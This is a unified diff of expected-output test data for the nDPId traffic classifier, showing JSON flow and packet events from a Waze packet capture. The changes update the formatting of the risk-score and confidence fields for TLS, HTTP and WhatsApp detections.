+00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":400,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587879850,"flow_last_seen":1435587879958,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587879958,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01247{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":428,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587879850,"flow_last_seen":1435587880568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3491,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":612,"midstream":0,"ts_msec":1435587880568,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880576,"flow_last_seen":1435587880576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587880576,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.31","src_port":43991,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1435587880576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1435587880576,"pkt":"ABoRAAACABoRAAABCABFAAA0U4FAAEAG6tYKECWdyKAEH6vXAFAtnZBdDlnt+YARAVu2DAAAAQEICgAIcK6K\/GDA"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1435587880577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587880577,"pkt":"ABoRAAACABoRAAABCABFAAAodUFAABAG+SLIoAQfChAlnQBQq9cOWe35LZ2QXlAQ\/\/9M8gAA"}
@@ -161,76 +168,76 @@
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1435587894241,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1435587894241,"pkt":"ABoRAAACABoRAAABCABFAAA87+5AAEAGZNsKCAABLjOtto0mAbvDfJnqAAAAAKAC\/\/\/\/twAAAgQFtAQCCAoACHYEAAAAAAEDAwg="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":533,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1435587894244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587894244,"pkt":"ABoRAAACABoRAAABCABFAAAodXFAABAGD20uM622CggAAQG7jSY8g2YVw3yZ61AS\/\/86\/gAA"}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1435587894244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587894244,"pkt":"ABoRAAACABoRAAABCABFAAAo7+9AAEAGZO4KCAABLjOtto0mAbvDfJnrPINmFlAQ\/\/86\/wAA"}
-00833{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587894241,"flow_last_seen":1435587894323,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587894323,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01157{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":537,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587894241,"flow_last_seen":1435587894759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":554,"midstream":0,"ts_msec":1435587894759,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}}
+00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587894241,"flow_last_seen":1435587894323,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587894323,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01343{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":537,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587894241,"flow_last_seen":1435587894759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":554,"midstream":0,"ts_msec":1435587894759,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587898822,"flow_last_seen":1435587898822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1435587898822,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1435587898822,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1435587898822,"pkt":"ABoRAAACABoRAAABCABFAAA8qMZAAEAGamAKCAABbKiw5MaMAbuJft8IAAAAAKAC\/\/93xAAAAgQFtAQCCAoACHfOAAAAAAEDAwg="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1435587898824,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587898824,"pkt":"ABoRAAACABoRAAABCABFAAAodXtAABAGzb9sqLDkCggAAQG7xox2gSD3iX7fCVAS\/\/+\/9AAA"}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1435587898824,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587898824,"pkt":"ABoRAAACABoRAAABCABFAAAoqMdAAEAGanMKCAABbKiw5MaMAbuJft8JdoEg+FAQ\/\/+\/9QAA"}
+00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587898822,"flow_last_seen":1435587898874,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1435587898874,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587905035,"flow_last_seen":1435587905035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1435587905035,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1435587905035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1435587905035,"pkt":"ABoRAAACABoRAAABCABFAAA82iNAAEAGeqYKCAABLjOtto0pAbvwXaAfAAAAAKAC\/\/\/IZgAAAgQFtAQCCAoACHo8AAAAAAEDAwg="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1435587905038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587905038,"pkt":"ABoRAAACABoRAAABCABFAAAodYZAABAGD1guM622CggAAQG7jSkPol\/g8F2gIFAS\/\/86+wAA"}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1435587905039,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587905039,"pkt":"ABoRAAACABoRAAABCABFAAAo2iRAAEAGerkKCAABLjOtto0pAbvwXaAgD6Jf4VAQ\/\/86\/AAA"}
-00833{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587905035,"flow_last_seen":1435587905111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587905111,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":580,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587905035,"flow_last_seen":1435587905510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"ts_msec":1435587905510,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}}
-01157{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":582,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587905035,"flow_last_seen":1435587905565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":416,"midstream":0,"ts_msec":1435587905565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}}
-00605{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880580,"flow_last_seen":1435587880589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52953,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587905035,"flow_last_seen":1435587905111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587905111,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01089{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":580,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587905035,"flow_last_seen":1435587905510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"ts_msec":1435587905510,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}}
+01343{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":582,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587905035,"flow_last_seen":1435587905565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":416,"midstream":0,"ts_msec":1435587905565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}}
+00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880580,"flow_last_seen":1435587880589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52953,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00566{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880580,"flow_last_seen":1435587880589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52953,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00644{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1435587868632,"flow_last_seen":1435587869162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1624,"flow_tot_l4_payload_len":3077,"flow_avg_l4_payload_len":181,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}}
-00641{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1435587869162,"flow_last_seen":1435587869302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}}
-00641{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871656,"flow_last_seen":1435587871946,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}}
-00642{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871658,"flow_last_seen":1435587871945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}}
-00642{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871941,"flow_last_seen":1435587872478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":552,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}}
-00642{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587872476,"flow_last_seen":1435587872705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}}
-00642{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587872702,"flow_last_seen":1435587872838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":391,"flow_tot_l4_payload_len":543,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}}
